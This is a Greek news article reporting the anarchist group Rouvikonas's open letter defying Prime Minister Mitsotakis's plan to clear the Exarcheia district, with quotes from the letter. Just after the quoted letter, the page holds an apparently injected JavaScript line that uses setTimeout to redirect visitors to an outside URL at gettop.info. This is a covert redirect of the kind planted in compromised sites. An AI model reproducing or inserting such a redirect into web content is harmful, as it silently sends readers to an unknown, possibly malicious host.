Ρουβίκωνας προς Μητσοτάκη για Εξάρχεια: Το θέμα δεν είναι πώς θα έρθετε αλλά πώς θα φύγετε

0
4

 

Σε επιστολή που αναρτήθηκε τα μεσάνυχτα σε ιστοσελίδα του αντιεξουσιαστικύ χώρου ο Ρουβίκωνας απαντά στις δηλώσεις του Κυριάκου Μητσοτάκη στη ΔΕΘ για την πρόθεσή του να εκκαθαρίσει τα Εξάρχεια όπου, όπως είπε, θα επιστρέψει η έννομη τάξη στην περιοχή.

Μεταξύ άλλων στην επιστολή της η αντιεξουσιαστική ομάδα Ρουβίκωνας αναφέρει: «Το θέμα δεν είναι πως θα έρθετε στα Εξάρχεια αλλά πως θα φύγετε».

Συγκεκριμένα:

«Δεν αμφιβάλλουμε ότι το κράτος μπορεί με στρατιωτικούς όρους να σπάσει τις καταλήψεις, να φυλακίσει αναρχικούς, να βάλει μόνιμα και μαζικά δυνάμεις καταστολής στα Εξάρχεια. Πιθανόν να μπορεί να το κάνει και σε ένα μήνα. Αλλά θα πρέπει όλοι τους, δεξιά και αριστερά να έχουν υπόψη τους ότι κάτι τέτοιο έχει ήδη γίνει και μάλιστα αρκετές φορές.

Η αφοσίωση, η αλληλεγγύη, η αδιαλλαξία των αναρχικών και πάνω από όλα το δίκαιο του αγώνα τους και το μικρό αλλά υπαρκτό ρίζωμά τους στο έδαφος της εκμεταλλευόμενης και καταπιεζόμενης κοινωνίας είναι αυτά που τους έδωσαν τη δύναμη να αντισταθούν, να επιβιώσουν και να αναπτύσσονται. Κι έτσι θα γίνει και την επόμενη φορά.

(…) Σε κάθε περίπτωση αν το κράτος, δεξιό ή αριστερό, θέλει να τσακίσει τον Ρουβίκωνα ας έρθει να το κάνει. Αν θέλει να τελειώσει τα Εξάρχεια ας έρθει να το κάνει (να δουλέψουν και με την ησυχία τους πια οι επενδυτές των ναρκωτικών). Αν θέλει να κλείσει στη φυλακή τους αναρχικούς, ας έρθει να το κάνει… Η εμπειρία του πρέπει να του έχει διδάξει ότι το ζήτημα δεν είναι πώς θα έρθει, αλλά πώς θα φύγει…». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here